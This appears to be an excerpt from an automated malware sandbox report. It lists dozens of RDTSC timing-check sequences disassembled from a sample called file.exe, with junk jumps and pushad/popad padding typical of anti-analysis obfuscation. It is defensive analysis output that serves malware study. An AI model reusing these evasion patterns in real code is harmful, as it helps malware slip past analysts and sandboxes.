Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB0763 second address: DB0780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0DE6F2Fh 0x00000009 jp 00007F99D0DE6F26h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D829AA second address: D649B9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99D0D12E1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F99D0D12E22h 0x00000011 nop 0x00000012 sub dx, BF80h 0x00000017 call dword ptr [ebp+122D2739h] 0x0000001d push edi 0x0000001e jmp 00007F99D0D12E1Ch 0x00000023 je 00007F99D0D12E24h 0x00000029 jmp 00007F99D0D12E1Ch 0x0000002e pushad 0x0000002f popad 0x00000030 pop edi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F99D0D12E1Bh 0x00000038 js 00007F99D0D12E2Bh 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D82F43 second address: D82F47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D82F47 second address: BBEA6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F99D0D12E1Ch 0x0000000c popad 0x0000000d nop 0x0000000e mov dx, si 0x00000011 push dword ptr [ebp+122D13FDh] 0x00000017 xor edx, dword ptr [ebp+122D2A67h] 0x0000001d call dword ptr [ebp+122D3960h] 0x00000023 pushad 0x00000024 mov dword ptr [ebp+122D2374h], eax 0x0000002a xor eax, eax 0x0000002c je 00007F99D0D12E1Eh 0x00000032 jmp 00007F99D0D12E20h 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b jmp 00007F99D0D12E1Dh 0x00000040 mov dword ptr [ebp+122D2CCFh], eax 0x00000046 pushad 0x00000047 pushad 0x00000048 xor edi, dword ptr [ebp+122D2CB7h] 0x0000004e popad 0x0000004f mov si, di 0x00000052 popad 0x00000053 mov esi, 0000003Ch 0x00000058 mov dword ptr [ebp+122D285Ah], eax 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 jmp 00007F99D0D12E27h 0x00000067 lodsw 0x00000069 jg 00007F99D0D12E1Ch 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 jno 00007F99D0D12E1Ch 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d jp 00007F99D0D12E1Ch 0x00000083 mov dword ptr [ebp+122D2374h], ebx 0x00000089 nop 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d pushad 0x0000008e popad 0x0000008f jmp 00007F99D0D12E23h 0x00000094 popad 0x00000095 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D82FBC second address: D83013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xor dword ptr [esp], 6238C374h 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F99D0DE6F28h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov edx, dword ptr [ebp+122D28BCh] 0x0000002e je 00007F99D0DE6F28h 0x00000034 mov edi, eax 0x00000036 push F1C40DA4h 0x0000003b push eax 0x0000003c push edx 0x0000003d jg 00007F99D0DE6F32h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D83133 second address: D83194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F99D0D12E1Dh 0x0000000e jmp 00007F99D0D12E27h 0x00000013 popad 0x00000014 xchg eax, esi 0x00000015 adc edi, 3239F41Ch 0x0000001b jmp 00007F99D0D12E27h 0x00000020 push eax 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F99D0D12E21h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D834A7 second address: D834AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D834AB second address: D834C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a jmp 00007F99D0D12E20h 0x0000000f pop edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7CFD5 second address: D7CFD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7CFD9 second address: D7CFDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D83D0C second address: D83D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0DE6F2Ah 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F99D0DE6F28h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 lea eax, dword ptr [ebp+12497757h] 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F99D0DE6F28h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 00000017h 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D83D69 second address: D83D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D83D6F second address: D83DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F99D0DE6F28h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 mov edx, dword ptr [ebp+122D179Fh] 0x00000029 pushad 0x0000002a pushad 0x0000002b and ebx, dword ptr [ebp+122D221Eh] 0x00000031 mov esi, ecx 0x00000033 popad 0x00000034 mov edi, 648D5202h 0x00000039 popad 0x0000003a mov dword ptr [ebp+122D26B4h], ebx 0x00000040 lea eax, dword ptr [ebp+12497713h] 0x00000046 mov dword ptr [ebp+122D2923h], esi 0x0000004c nop 0x0000004d jmp 00007F99D0DE6F2Fh 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D83DD7 second address: D83DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB48F4 second address: DB4916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F99D0DE6F39h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBC8B6 second address: DBC8CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBC8CF second address: DBC8D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBCA1F second address: DBCA25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBCA25 second address: DBCA2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBCA2B second address: DBCA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F99D0D12E16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBCA35 second address: DBCA39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBCBC3 second address: DBCBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBC5DA second address: DBC5E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBC5E7 second address: DBC5EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBD495 second address: DBD49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBD49A second address: DBD4AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0D12E1Bh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBD4AB second address: DBD4BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F99D0DE6F26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC4CBC second address: DC4CCE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F99D0D12E16h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC4CCE second address: DC4CD8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F99D0DE6F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC4CD8 second address: DC4CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC7CF9 second address: DC7D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F99D0DE6F32h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC7542 second address: DC754A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC754A second address: DC754E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC7841 second address: DC7847 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC7847 second address: DC7850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC7850 second address: DC7883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F99D0D12E16h 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F99D0D12E22h 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 jnl 00007F99D0D12E1Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC7A13 second address: DC7A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F99D0DE6F26h 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f jnp 00007F99D0DE6F2Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD004D second address: DD005C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007F99D0D12E16h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD05F5 second address: DD060B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F32h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD0908 second address: DD090E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD0AAF second address: DD0AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD0AB3 second address: DD0ACA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007F99D0D12E16h 0x00000013 pop esi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD4C4C second address: DD4C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD4C57 second address: DD4C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD4C5B second address: DD4C6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F99D0DE6F26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD4F30 second address: DD4F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD507E second address: DD50B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F99D0DE6F37h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F99D0DE6F34h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD5216 second address: DD522D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F99D0D12E1Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD522D second address: DD523A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD523A second address: DD5240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD5240 second address: DD5245 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD5245 second address: DD524F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDDF03 second address: DDDF21 instructions: 0x00000000 rdtsc 0x00000002 je 00007F99D0DE6F40h 0x00000008 jmp 00007F99D0DE6F34h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDE1EC second address: DDE1F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDE1F7 second address: DDE1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDEADE second address: DDEAEF instructions: 0x00000000 rdtsc 0x00000002 je 00007F99D0D12E18h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDEAEF second address: DDEAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDEDBA second address: DDEDC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D83A8F second address: D83A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDFC21 second address: DDFC42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F99D0D12E1Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE3F42 second address: DE3F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE31FE second address: DE3202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE3202 second address: DE3217 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99D0DE6F26h 0x00000008 ja 00007F99D0DE6F26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE3217 second address: DE3226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0D12E1Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE3933 second address: DE395D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99D0DE6F2Ah 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F99D0DE6F38h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF086D second address: DF0872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF0872 second address: DF0898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jnl 00007F99D0DE6F26h 0x0000000e popad 0x0000000f jl 00007F99D0DE6F2Eh 0x00000015 jnp 00007F99D0DE6F26h 0x0000001b pushad 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 push edx 0x00000025 pop edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF0898 second address: DF08C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F99D0D12E1Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F99D0D12E16h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEE950 second address: DEE956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEEAC6 second address: DEEACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEED40 second address: DEED57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F99D0DE6F28h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007F99D0DE6F26h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEED57 second address: DEED5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEED5B second address: DEED61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF0B9 second address: DEF104 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E23h 0x00000007 jmp 00007F99D0D12E20h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F99D0D12E1Ch 0x00000014 jno 00007F99D0D12E16h 0x0000001a jmp 00007F99D0D12E1Ah 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF104 second address: DEF10C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF10C second address: DEF128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F99D0D12E27h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF3FD second address: DEF401 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF401 second address: DEF407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF56D second address: DEF571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF571 second address: DEF599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F99D0D12E26h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF599 second address: DEF5AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0DE6F30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF733 second address: DEF73B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEFF72 second address: DEFF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnc 00007F99D0DE6F30h 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F99D0DE6F2Ch 0x00000013 jl 00007F99D0DE6F2Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEFF9D second address: DEFFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEFFA3 second address: DEFFAA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF06E1 second address: DF06E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
